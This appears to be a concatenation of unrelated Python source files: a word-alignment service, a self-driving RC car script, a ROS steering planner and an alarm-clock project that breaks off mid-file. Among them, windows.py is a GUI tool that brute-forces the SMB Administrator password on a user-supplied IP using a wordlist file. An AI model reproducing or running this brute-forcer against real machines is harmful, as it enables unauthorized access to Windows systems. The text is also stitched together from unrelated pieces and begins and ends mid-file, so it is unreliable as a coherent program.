pool.teardown()
|
services.py
|
import os
import subprocess
import sys
import threading
# Not used now, leaving it here for future use with command line tools
class LineSubProcess(object):
"""
Class to communicate with arbitrary line-based bash scripts.
Uses various mechanism to enforce line buffering.
# When calling python scripts ...
You need to use -u flag, e.g. `python -u my_script.py`
instead of `python my_script.py` to prevent python interpreter's
internal buffering.
"""
# TODO: handle stderr
# Prefixing a command with this sets up
# stdout & stderr buffering to line-based:
prefix = "stdbuf -oL -eL "
@staticmethod
def get_process(command):
stderr = sys.stderr if has_fileno(sys.stderr) else None
return Popen(
LineSubProcess.prefix + command,
shell=True, # enable entering whole command as a single string
bufsize=1, # line buffer
universal_newlines=True, # string-based input/output
stdin=PIPE,
stdout=PIPE,
stderr=stderr
)
def __init__(self, command):
"""
...
Make sure the given command does not buffer input/output by itself.
"""
self.command = command
self.process = LineSubProcess.get_process(self.command)
def __call__(self, line):
assert "\n" not in line
try:
self.process.stdin.write(line + "\n")
except ValueError:
# In the case the process has died for some reason,
# try to invoke it once again.
self.process = LineSubProcess.get_process(self.command)
self.process.stdin.write(line + "\n")
return self.process.stdout.readline().strip()
def __del__(self):
self.process.kill()
def get_joined_json_from_json(data, tool):
for i in range(len(data["sentences"])):
print ("%s:%s"%(i,data["sentences"][i]))
print(data["sentences"][i]["tgt"]['text'])
#data[i]["src"]["text"]=data[i]["tgt"]["text"]
data["sentences"][i]["tgt"]["text"]=tool(data["sentences"][i]["tgt"]["text"])
return data
# Simplified, non-threadsafe version for force_align.py
# Use the version in realtime for development
class Aligner:
def __init__(self, fwd_params, fwd_err, rev_params, rev_err, heuristic='grow-diag-final-and', build_root="/doc_translation/fast_align/build"):
fast_align = os.path.join(build_root, 'fast_align')
atools = os.path.join(build_root, 'atools')
(fwd_T, fwd_m) = self.read_err(fwd_err)
(rev_T, rev_m) = self.read_err(rev_err)
fwd_cmd = [fast_align, '-i', '-', '-d', '-T', fwd_T, '-m', fwd_m, '-f', fwd_params]
rev_cmd = [fast_align, '-i', '-', '-d', '-T', rev_T, '-m', rev_m, '-f', rev_params, '-r']
tools_cmd = [atools, '-i', '-', '-j', '-', '-c', heuristic]
self.fwd_align = popen_io(fwd_cmd)
self.rev_align = popen_io(rev_cmd)
self.tools = popen_io(tools_cmd)
def __call__(self, line):
self.fwd_align.stdin.write('{}\n'.format(line))
self.rev_align.stdin.write('{}\n'.format(line))
# f words ||| e words ||| links ||| score
fwd_line = self.fwd_align.stdout.readline().split('|||')[2].strip()
rev_line = self.rev_align.stdout.readline().split('|||')[2].strip()
self.tools.stdin.write('{}\n'.format(fwd_line))
self.tools.stdin.write('{}\n'.format(rev_line))
al_line = self.tools.stdout.readline().strip()
return al_line
def close(self):
self.fwd_align.stdin.close()
self.fwd_align.wait()
self.rev_align.stdin.close()
self.rev_align.wait()
self.tools.stdin.close()
self.tools.wait()
def read_err(self, err):
(T, m) = ('', '')
for line in open(err):
# expected target length = source length * N
if 'expected target length' in line:
m = line.split()[-1]
# final tension: N
elif 'final tension' in line:
T = line.split()[-1]
return (T, m)
def popen_io(cmd):
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1, universal_newlines=True)
def consume(s):
for _ in s:
pass
threading.Thread(target=consume, args=(p.stderr,)).start()
return p
class AlignerService:
def __init__(self, iterable=(), **kwargs):
self.__dict__.update(iterable, **kwargs)
self.aligner = Aligner(self.fwd_params,self.fwd_err,self.rev_params,self.rev_err)
print(self.__dict__)
def do(self, data):
for i in range(len(data["sentences"])):
src=data["sentences"][i]["src"]["text"]
tgt=data["sentences"][i]["tgt"]["text"]
if src.isspace() or tgt.isspace() or src=='' or tgt=='':
a=''
else:
a=self.aligner(' ||| '.join((data["sentences"][i]["src"]["text"], data["sentences"][i]["tgt"]["text"])))
data["sentences"][i]["alignment"]=a
return data
|
autonomous_v7.py
|
'''
Notes:
After executing ctrl-z, the nn isn't taking the second-best proba from the previous prediction array.
It's making a new prediction, and then going with the second-best from that array.
In v.8, make it take the second-best from the previous prediction.
'''
import car
import cv2
import numpy as np
import os
import serial
import socket
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
dir_log = []
SIGMA = 0.40
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign_pjy.xml')
timestr = time.strftime('%Y%m%d_%H%M%S')
class RCDriver(object):
def steer(self, prediction):
# FORWARD
if np.all(prediction == [ 0., 0., 1.]):
car.forward(150)
car.pause(300)
dir_log.append('Forward')
print 'Forward'
# FORWARD-LEFT
elif np.all(prediction == [ 1., 0., 0.]):
car.left(300)
car.forward_left(200)
car.left(700)
car.pause(200)
dir_log.append('Left')
print 'Left'
# FORWARD-RIGHT
elif np.all(prediction == [ 0., 1., 0.]):
car.right(300)
car.forward_right(200)
car.right(700)
car.pause(200)
dir_log.append('Right')
print 'Right'
def stop(self):
print '* * * STOPPING! * * *'
car.pause(5000)
rcdriver = RCDriver()
class ObjectDetection(object):
global rcdriver
global stop_classifier
def detect(self, cascade_classifier, gray_image, image):
# STOP SIGN
stop_sign_detected = cascade_classifier.detectMultiScale(
gray_image,
scaleFactor=1.1,
minNeighbors=10,
minSize=(35, 35),
maxSize=(45, 45))
# Draw a rectangle around stop sign
for (x_pos, y_pos, width, height) in stop_sign_detected:
cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)
# Execute the full stop
if np.any(stop_sign_detected):
rcdriver.stop()
# PEDESTRIAN
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
orig = image.copy()
# Look for predestrians in the image
(rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
padding=(8, 8), scale=1.05)
# Draw the ORIGINAL bounding boxes
for (x, y, w, h) in rects:
cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)
# Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
# boxes that are still people
rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)
# Draw the FINAL bounding boxes
for (xA, yA, xB, yB) in pick:
cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
obj_detection = ObjectDetection()
class TrustButVerify(object):
global dir_log
def __init__(self):
# Arbitrarily designating a 'corner' as some % of width from either edge (e.g. 15%)
self.corner_pct = .15
def scan_for_signal(self, filtered_img):
# Lower Left and Right corners
last_row = filtered_img[-1]
img_total_width = len(last_row)
img_corner_width = img_total_width * self.corner_pct
left_corner = last_row[ : img_corner_width + 1]
right_corner = last_row[ -img_corner_width : ]
# GOAL: Need a sum of 255 in either corner, which means at least the edge of a lane marker is visible in a corner
# If either corner < 255, then return False to activate ctrl-z mode
if sum(left_corner) < 255 or sum(right_corner) < 255:
print 'SIGNAL IN ONE CORNER NOT PRESENT'
return False
return True
def ctrl_z(self):
print '\n< < < CTRL-Z MODE ACTIVATED! > > >'
last_dir = dir_log[-1]
# Forward -> Reverse
if last_dir == 'Forward':
car.reverse(200)
car.pause(500)
print '< REVERSE >'
# Left -> Reverse-Left
elif last_dir == 'Left':
car.left(300)
car.reverse_left(250)
car.left(700)
car.pause(500)
print '< REVERSE-LEFT >'
# Right -> Reverse-Right
elif last_dir == 'Right':
car.right(300)
car.reverse_right(250)
car.right(700)
car.pause(500)
print '< REVERSE-RIGHT >'
return
TBV = TrustButVerify()
class NeuralNetwork(object):
global stop_classifier
global timestr
def __init__(self, receiving=False, piVideoObject=None):
self.ctrl_z_mode = False
self.receiving = receiving
self.model = keras.models.load_model('nn_h5/nn.h5')
# PiVideoStream class object is now here.
self.piVideoObject = piVideoObject
self.rcdriver = RCDriver()
print 'NeuralNetwork_init OK'
self.fetch()
def auto_canny(self, blurred):
# Compute the median of the single channel pixel intensities
global SIGMA
v = np.median(blurred)
# Apply automatic Canny edge detection using the computed median of the image
lower = int(max(0, (1.0 - SIGMA) * v))
upper = int(min(255, (1.0 + SIGMA) * v))
edged = cv2.Canny(blurred, lower, upper)
return edged
def preprocess(self, frame):
image_array = frame.reshape(1, 38400).astype(np.float32)
image_array = image_array / 255.
return image_array
def predict(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
i_max = np.argmax(y_hat)
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max, 1)
return y_hat_final[0], y_hat
def predict_second_best(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
print 'y_hat:', y_hat
y_hat_list = []
for each in y_hat[0]:
y_hat_list.append(each)
print 'y_hat as list', y_hat_list
i_max_second = np.argsort(y_hat_list)[::-1][1]
print 'i_max_second', i_max_second
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max_second, 1)
return y_hat_final[0], y_hat
def fetch(self):
frame = 0
while self.receiving:
# There's a chance that the Main thread can get to this point before the New thread begins streaming images.
# To account for this, we create the jpg variable but set to None, and keep checking until it actually has something.
jpg = None
while jpg is None:
jpg = self.piVideoObject.frame
gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
# Object detection
obj_detection.detect(stop_classifier, gray, image)
# Lower half of the grayscale image
roi = gray[120:240, :]
# Apply GuassianBlur (reduces noise)
blurred = cv2.GaussianBlur(roi, (3, 3), 0)
# Apply Canny filter
auto = self.auto_canny(blurred)
# Show streaming images
cv2.imshow('Original', image)
cv2.imshow('What the model sees', auto)
# *** NEW FEATURE: Trust but verify (TBV) ***
# Check for signal in lower corners of image (boolean). If True, then s'all good. If Not, then...
if not TBV.scan_for_signal(auto):
# TBV.ctrl_z() takes car back one step, then ctrl_z_mode is now True.
TBV.ctrl_z()
self.ctrl_z_mode = True
continue # return to top of while loop to get a fresh jpg
# If TBV.scan_for_signal() returned False, ctrl_z_mode is now True. Proceed with model's second best prediction.
if self.ctrl_z_mode:
prediction, probas = self.predict_second_best(auto)
# Switch ctrl_z_mode back to False.
self.ctrl_z_mode = False
# If TBV.scan_for_signal returned True, then all is well. ctrl_z_mode is False, and model makes prediciton on argmax proba.
else:
prediction, probas = self.predict(auto)
# Save frame and prediction record for debugging research
prediction_english = None
prediction_english_proba = None
proba_left, proba_right, proba_forward = probas[0]
if np.all(prediction == [ 0., 0., 1.]):
prediction_english = 'FORWARD'
prediction_english_proba = proba_forward
elif np.all(prediction == [ 1., 0., 0.]):
prediction_english = 'LEFT'
prediction_english_proba = proba_left
elif np.all(prediction == [ 0., 1., 0.]):
prediction_english = 'RIGHT'
prediction_english_proba = proba_right
# Text on saved image
cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Forward: {}".format(proba_forward), (10, 40), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Left: {}".format(proba_left), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Right: {}".format(proba_right), (10, 80), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
frame += 1
# Send prediction to driver to tell it how to steer
self.rcdriver.steer(prediction)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.stop()
cv2.destroyAllWindows()
class PiVideoStream(object):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self.server_socket.bind(('192.168.1.66', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
self.server_socket.bind(('10.10.10.2', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
print 'Listening...'
self.server_socket.listen(0)
# Accept a single connection ('rb' is 'read binary')
self.connection = self.server_socket.accept()[0].makefile('rb')
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
self.stream_bytes = ' '
self.start()
def start(self):
# start the thread to read frames from the video stream
print 'Starting PiVideoStream thread...'
print ' \"Hold on to your butts!\" '
# Start a new thread
t = threading.Thread(target=self.update, args=())
t.daemon=True
t.start()
print '...thread running'
# Main thread diverges from the new thread and activates the neural_network
# The piVideoObject argument ('self') passes the PiVideoStream class object to NeuralNetwork.
NeuralNetwork(receiving=True, piVideoObject=self)
def update(self):
while True:
self.stream_bytes += self.connection.read(1024)
first = self.stream_bytes.find('\xff\xd8')
last = self.stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
self.frame = self.stream_bytes[first:last + 2]
self.stream_bytes = self.stream_bytes[last + 2:]
def read(self):
# return the frame most recently read
return self.frame
if __name__ == '__main__':
try:
# Create an instance of PiVideoStream class
video_stream = PiVideoStream()
except KeyboardInterrupt:
# Rename the folder that collected all of the test frames. Then make a new folder to collect next round of test frames.
os.rename( './test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
os.makedirs('./test_frames_temp')
print '\nTerminating...\n'
car.pause(10000)
# Close video_stream thread.
video_stream = PiVideoStream()
video_stream.stop()
video_stream.connection.close()
# Close serial connection to Arduino controller.
ser = serial.Serial(port.device, 9600)
ser.close()
print '\nDone.\n'
|
windows.py
|
import fs.smbfs
from tkinter import*
from tkinter import messagebox
import threading
#--------------------------SMb---------------------
number = 0
password_list = []
bools = True
def read(target,numbers):
global number
global password_list
messagebox.showinfo("密码破解","破解开始,详情请见命令行")
print('开始破解')
path = 'pwd.txt'
file = open(path,'r')
while bools:
try:
pwd = file.readline()
fs.smbfs.SMBFS(host=target, username='Administrator', passwd=pwd)#不断尝试密码
except AttributeError:
print('错误的IP')
except:
password_list.append(pwd)
if number == 10:
print('[-]密码错误 --number=10:',password_list)
number = 0
else:
number = number + 1
else:
print('[*]密码正确:',pwd)
passwd = '密码破解成功 Administrator:'+pwd
messagebox.showinfo("密码破解",passwd)
return True
break
def start_password():
global bools
target = en.get()
numbers = 1
bools = True
t = threading.Thread(target=read,args=(target,numbers))
t.start()
def stop_password():
global bools
bools = False
messagebox.showinfo("密码破解","破解结束结束")
return True
#---------------------------------------------------
tk = Tk()
tk.title('密码破解-windows')
tk.geometry('300x160+420+200')
#----------------------------------------------------
en = Entry(tk)
en.place(x=80,y=40)
#--------------------------text------------------
w= Label(tk,text='目标IP:',fg="red")
w.place(x=20,y=40)
#------------------------start or stop----------------
b = Button(tk, text ="开始破解", command=start_password)
b.place(x=20,y=80)
b_2 = Button(tk, text ="停止", command=stop_password)
b_2.place(x=200,y=80)
tk.mainloop()
#------------------------start-GUI--------------------
tk.mainloop()
#-------------------------over-------------------------
|
planner.py
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import threading,math
import rospy,tf
from geometry_msgs.msg import Twist
from std_msgs.msg import *
planner_status = False
steering_last = 0.0
def start_planner_sub(data):
global planner_status
planner_status = data.data
print 'planner_status = ',planner_status
def planner_publisher():
global planner_status
global steering_last
throttle_control = 0
steering_control = 0
throttle_limit = 100
steering_limit = 20
stop_dist = 0.5
target_x_dist_limit = 0.2
throttle_speed = 50
target_x_dist = 0
linear = 0
angular = 0
angular_P_gain = 1.0
linear_P_gain = 1.0
steering_angle_pub = rospy.Publisher('/steering_angle', Int16, queue_size=5)
throttle_pub = rospy.Publisher('/throttle', Int16, queue_size=5)
tf_listener = tf.TransformListener()
pose = []
rate = rospy.Rate(3)
throttle_msg = Int16()
steering_angle_msg = Int16()
throttle_msg.data = 0
steering_angle_msg.data = 0
while not rospy.is_shutdown():
try:
(trans, rot) = tf_listener.lookupTransform('/footprint_head', '/target', rospy.Time(0))
angular = 1.0 * math.atan2(trans[1], trans[0])
linear = 1.0 * math.sqrt(trans[0] ** 2 + trans[1] ** 2)
if linear > 2.0:
angular_P_gain = 2.0/linear
else:
angular_P_gain = 1.0
angular = angular_P_gain * angular
linear = linear_P_gain * linear
steering_last = steering_last*0.5 + math.degrees(-angular)*0.5
target_x_dist = trans[0]
# print 'x = ',target_x_dist
if linear > stop_dist and abs(target_x_dist) > target_x_dist_limit:
throttle_control = throttle_speed
steering_control = int(steering_last)
if linear > stop_dist and abs(target_x_dist) <= target_x_dist_limit:
print 'Position Shift! cannot be reached'
throttle_control = 0
steering_control = 0
if linear <= stop_dist: #distance limit
throttle_control = 0
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
throttle_control = 0
steering_control = 0
planner_status = False
print e
if throttle_control >= throttle_limit:
throttle_control = throttle_limit
elif throttle_control <= -throttle_limit:
throttle_control = -throttle_limit
if steering_control >= steering_limit:
steering_control = steering_limit
elif steering_control <= -steering_limit:
steering_control = -steering_limit
# print 'target_dist = ',linear
# print 'target_angle_degree = ',math.degrees(-angular)
if planner_status:
print 'steering_control_degree = ',steering_control
throttle_msg.data = throttle_control
steering_angle_msg.data = steering_control
throttle_pub.publish(throttle_msg),
steering_angle_pub.publish(steering_angle_msg)
rate.sleep()
if __name__ == '__main__':
rospy.init_node('simple_planner', anonymous=False)
rospy.Subscriber('start_planner', Bool, start_planner_sub)
rate = rospy.Rate(3)
# t = threading.Thread(target=start_planner_loop)
# t.daemon = True
# t.start()
planner_publisher()
|
main.py
|
'''
Project: Kail Birthday Present
Author(s): Pekka Lehtikoski and Sofie Lehtikoski
Description: An expandable life-manager device, starting
with an alarm clock and inspirational message
selector. :)
'''
import time
import datetime
import RPi.GPIO as GPIO
import threading
from pygame import mixer
import math
import copy
import os
#import st7735s as controller
#import Python_ST7735.ST7735 as TFT
#import Adafruit_GPIO.SPI as SPI
#from st7735_tft.st7735_tft import ST7735_TFT
from st7735.library.ST7735 import ST7735 as ST7735_TFT
from PIL import Image
GPIO.setmode(GPIO.BOARD)
# HARDWARE COMPONENTS AND ABSTRACTION
class ButtonController(object):
'''
The base controller class for each of the buttons.
Allows support for interfacing with the display and
speaker.
'''
def __init__(self,):
pass
class InspirationalButton(ButtonController):
'''
Button that shuffles through inspirational
messages and outputs them to the speaker
'''
def __init__(self,speaker,channel):
self.speaker = speaker
# Start editing mode button
midChnl = channel
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.RISING)
GPIO.add_event_callback(midChnl, self.speaker.playInspirationMsg)
class SetAlarmButton(ButtonController):
'''
Button that sets the alarm time on the display and
internal program. Interfaces with the display and directly
feeds it instructions based on the editing button feedback.
'''
def __init__(self,display,channels):
# Initialize display
#channels format: {'MID':10,'UP':29,'DOWN':31,'LEFT':7,'RIGHT':15}
self.display = display
# SET UP GPIO PINs for the given button
#
# Start editing mode button
midChnl = channels['MID'] # SET button
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.startEditingMode)
# Direction buttons
midChnl = channels['UP']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.incrementDigit)
midChnl = channels['DOWN']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.decrementDigit)
midChnl = channels['LEFT']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.selectLeftDigit)
midChnl = channels['RIGHT']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.selectRightDigit)
#if GPIO.input(10):
#GPIO.wait_for_edge(10, GPIO.RISING)
def getAlarmTime(self,):
# Gets the stored alarm time displayed
return self.display.getAlarmTime()
class OnOffSwitch(ButtonController):
'''
TOGGLE SWITCH that is able to turn the alarm on and off.
Does not need to interface with any other hardware,
only the base program internals.
'''
#isOn = True # TODO: Delete when GpIO is actually connected
def __init__(self,channel):
''' Sets the hardware switch based on the on/off '''
self.chnnl = channel
GPIO.setup(self.chnnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
def checkIsOn(self,):
'''
If hardware switch is ON (connects wires), then we should
return False (reversed logic so that when the switch is
entirely disconnected, it by default returns True)
'''
#print('GPIO input')
#print(GPIO.input(self.chnnl))
return not GPIO.input(self.chnnl)
class Speaker(object):
'''
A wrapper for the speaker hardware to allow basic controls
in Python. Includes controls for grabbing the audioclip to play.
Future dreams:
- connect speaker via bluetooth insteadof GPIO?
- connect speaker to webradio for a radio or music option
'''
basepath = "/coderoot/pins/tests/alarmclock/code"# '/'.join(__file__.split('/')[:-1]) # TODO: Hardcoded path
audiopath = basepath + '/audiofiles'
print(audiopath)
inspirational_msgs = [
# List of inspirational messages, as audio files to pull from
'./audiofiles/inspiration/'+filename for filename in os.listdir(audiopath+'/inspiration')
]
morning_msgs = [
# List of wake-up messages played at the alarm times (also audio files)
'./audiofiles/morning/'+filename for filename in os.listdir(audiopath+'/morning')
]
def __init__(self,channels):
''' Sets up the Speaker pi channel '''
# Raspberry Pi GPIO stuff
#self.leftChannel = channels["LEFT"] # Pins will be configured in
# operating system for auto-detection, not here
#GPIO.setup(self.leftChannel, GPIO.OUT, initial=GPIO.LOW)
# Sound play-back setup
mixer.init(buffer=2048) # NOTE: Small buffer size allocated to prevent memory/underrun issues with the pi 0
def messageShuffle(self, messageList):
'''
Selects a message from the messageList
at random and outputs it
'''
import random
ind = random.randint(0,len(messageList)-1)
return messageList[ind]
def playMorningAlarm(self,):
''' Plays a random morning alarm from the morning audio set '''
audiofile = self.messageShuffle(self.morning_msgs)
self.startSound(audiofile)
def playInspirationMsg(self,callback_channel):
''' Plays inspirational message from the inspirational audio set '''
audiofile = self.messageShuffle(self.inspirational_msgs)
self.startSound(audiofile)
def startSound(self,soundclip):
'''
Starts playing the soundclip (given as an audio file path)
TODO: Requires understanding of hardware mechanics. -> add
to GPIO board somehow rather than just playing it to Linux.
(We need our GPIO-connected speaker to somehow be
recognized as a sound output device by the Pi?)
'''
if not mixer.music.get_busy():
# Won't restart from beginning if it's already playing
# (prevent startSound to be called multiple times in the same second)
mixer.music.load(soundclip)
mixer.music.play()
#GPIO.output(self.leftChannel, GPIO.HIGH)
class Display(object):
'''
A wrapper for the display hardware to allow basic controls
in Python. Includes basic time-displaying functionalities.
Future dreams (TODO):
- sleep progress bar (sleep tracking! If you are awake to see this, that's a probleM!)
- display real time instead of alarm time? or next to? (one can be smaller than the other)
- be able to make 2D array keyboard controllable by set alarm button, in order to config the
wifi
'''
# Stored Time Globals
currentTime = [0,0,0,0] # The current time to display
alarmTime = [1,0,0,0] # The stored display/alarm time, in a readable
# format (should contain 4 int digits, in 24-hour time)
tempAlarmTime = [0,0,0,0] # Temporary storage for the alarmTime while editing
# (allows resetting)
# Display globals
digitToImg = { # Number to PIL Image file
1:None,2:None,3:None,4:None,5:None,6:None,7:None,8:None,9:None,0:None,'clear':None,'colon':None
}
screenWidth = 160
screenHeight = 128
# Editing Interface/Button Globals
editModeInd = -1 # Blinky time-editting mode, index matches the digit that should
# be blinking (unless -1, in which case editing mode is off)
buttonDelay = 0.3 # The amount of time before another button press is allowed, to prevent multiple presses
buttonTime = 0.0 # A time tracker for the button
def __init__(self,channels):
'''
Initiates the display hardware and begins rendering
on the display (in a separate thread).
'''
# Pins
#BCMconversions = {22:25,36:16,16:23}
self.screen = ST7735_TFT(
port = 0,
cs = 0,
dc = channels['DC'],
backlight = channels['BACKLIGHT'],
rst = channels['RST'],
spi_speed_hz = 24000000,#,#
width = self.screenHeight,#128, #160,
height= self.screenWidth,#160, #128
offset_left=0,
offset_top=0,
rotation=0
)
#self.nightLight = channels['NIGHTLIGHT'] # TODO: Comment out, LED is for testing only
#GPIO.setup(self.nightLight, GPIO.OUT, initial=GPIO.LOW)
#GPIO.output(self.nightLight, GPIO.HIGH) # FOR TESTING ONLY
#time.sleep(2)
#GPIO.output(self.nightLight, GPIO.LOW)
# Set all the digits appropriately given the files
for num in self.digitToImg.keys():
filepath = './digit_sheet/'+str(num)+'.png'
self.digitToImg[num] = Image.open(filepath)
# Start rendering the display
self.startRendering()
# EDITING MODE FUNCS (serve as callbacks to setAlarm button inputs)
def buttonWrapper(buttonFunc):
'''
Decorater func to deal with button timings and
prevent unintended double-clicking
'''
def wrapper(self,callback_channel):
if GPIO.input(callback_channel):
# Is rising
if self.buttonTime >= self.buttonDelay:
# Button is only called if past the falling-edge delay
# (prevents double-clicking)
buttonFunc(self,callback_channel)
self.buttonTime = 0.
else:
# Is falling, starts the button timer
self.buttonTime = time.time()
return wrapper
@buttonWrapper
def startEditingMode(self,callback_channel):
'''
Start the editing mode by blinking the first digit on and off.
Can also stop the editing mode instead if it stops.
'''
if self.editModeInd == -1:
# Editing mode was off, intialize it
self.editModeInd = 0
self.tempAlarmTime = self.alarmTime
else:
# Editing mode was on, turn it off
self.editModeInd = -1
@buttonWrapper
def incrementDigit(self,callback_channel):
''' Increments a digit during the editing mode '''
if self.editModeInd != -1:
modNum = 3 if self.editModeInd==0 else \
10 if (self.editModeInd == 1 or self.editModeInd == 3) else 6
self.alarmTime[self.editModeInd] = (self.alarmTime[self.editModeInd] + 1) % modNum
@buttonWrapper
def decrementDigit(self,callback_channel):
''' Decrements a digit during the editing mode '''
if self.editModeInd != -1:
modNum = 3 if self.editModeInd==0 else \
10 if (self.editModeInd == 1 or self.editModeInd == 3) else 6
self.alarmTime[self.editModeInd] = (self.alarmTime[self.editModeInd] - 1) % modNum
@buttonWrapper
def selectLeftDigit(self,callback_channel):
''' Edits the digit to the left now instead '''
if self.editModeInd != -1:
self.editModeInd = (self.editModeInd - 1) % len(self.alarmTime)
@buttonWrapper
def selectRightDigit(self,callback_channel):
''' Edits digit to the right now instead '''
if self.editModeInd != -1:
self.editModeInd = (self.editModeInd + 1) % len(self.alarmTime)
@buttonWrapper
def resetEdits(self,callback_channel):
''' Resets the alarmTime to the value it was before any edits happened '''
self.alarmTime = self.tempAlarmTime
def isEditing(self,):
''' Returns true if editing mode is on '''
return self.editModeInd != -1
# GENERAL RENDERING AND FUNCS
def startRendering(self,):
'''
Starts rendering the display in a separate THREAD, using a
given refresh rate. Also creates a blinky effect on the
position self.editModeInd when editing mode is enabled.
'''
th = threading.Thread(target=self.renderingThread)
th.start()
def renderingThread(self,):
''' Start screen rendering application. '''
blinkDelay = .5 # .5 second blink delay
isOdd = False
while True:
if self.editModeInd != -1:
# Editing mode is enabled, render alarm time and
# make the current digit being edited digit blink by
# adding it on every second loop
alarmTime = copy.deepcopy(self.alarmTime)
if isOdd:
alarmTime[self.editModeInd] = 'clear'
isOdd = False
else:
isOdd = True
self.renderAlarmTime(alarmTime)
time.sleep(blinkDelay)
else:
# Normal mode, display current time instead
self.renderAlarmTime(self.currentTime)
time.sleep(1)
def getAlarmTime(self,):
return self.alarmTime
def updateCurrentTime(self,newCurrTime):
'''
Updates the current time with newCurrTime
'''
self.currentTime = newCurrTime
def updateAlarmTime(self,newAlarmTime):
'''
Updates the real display time (the alarm time that
is stored) according to the given input
'''
self.alarmTime = newAlarmTime
def createDigitBitmap(self,digit):
'''
Creates a digit bitmap for the given digit or character,
using the self.digitToImg dictionary
(Note: the only additional character you'd really need for
this is the colon, ":")
Inputs:
digit (int): the digit to render. if None, then the
created bitmap should be all dark/blank
Outputs:
dbitmap (list) : a PIL image object
'''
return self.digitToImg[digit]
def renderAlarmTime(self,alarmTime):
'''
Inputs:
alarmTime (list) : list of four int digits, to render
on-screen in the appropriate order
NOTE: if editMode==True, this should become blinky somehow
'''
# Convert the alarm time into a set of appropriate PIL image files
adjAlarmTime = alarmTime[:2] + ["colon"] + alarmTime[2:] # Adjusted alarm time to include the colon
imgList = [self.createDigitBitmap(d) for d in adjAlarmTime]
# Combines the imgList items in a
# nice and correctly sized format with margin
size = (self.screenWidth,self.screenHeight)
timeImg = Image.new('RGB',size,color='#FFFFFF')
vDist = int((size[1] - imgList[0].height) / 2)
hStart = int((size[0] - sum([img.width for img in imgList])) / 2)
timeImg.paste(imgList[0], (hStart, vDist))
hDist = imgList[0].width + hStart
for ind in range(1,len(imgList)):
# Concatenates the images horizontally
timeImg.paste(imgList[ind], (hDist, vDist))
hDist += imgList[ind].width
# Apply to the display screen.
timeImg = timeImg.transpose(Image.ROTATE_90) # rotate due to weird display weirdness
#timeImg.save('currTime.jpg') # for TESTING only
self.screen.display(timeImg)#draw(timeImg)
# OTHER ABSTRACTION CLASSES
class Time(object):
'''
A stored time object (as a list of 4 ints) in 24-hour time.
Contains helpful operations, like comparators.
TODO: pull in all time object data into here instead for
consistency and easy maintainability.
'''
pass
# BASE PYTHON CONTROLS
# (manages and coordinates all the above elements)
class AlarmClock(object):
'''
Class that coordinates and manages all
the hardware and life-manager features.
'''
# Globals
lastCheckedTime = [] # Last checked time object (list of four ints)
def __init__(self,speaker,display,inspbutton,setalarmbutton,onoffbutton):
'''
Initiates the AlarmClock class with the necessary hardware components.
speaker : The python wrapper object for the speaker (hardware)
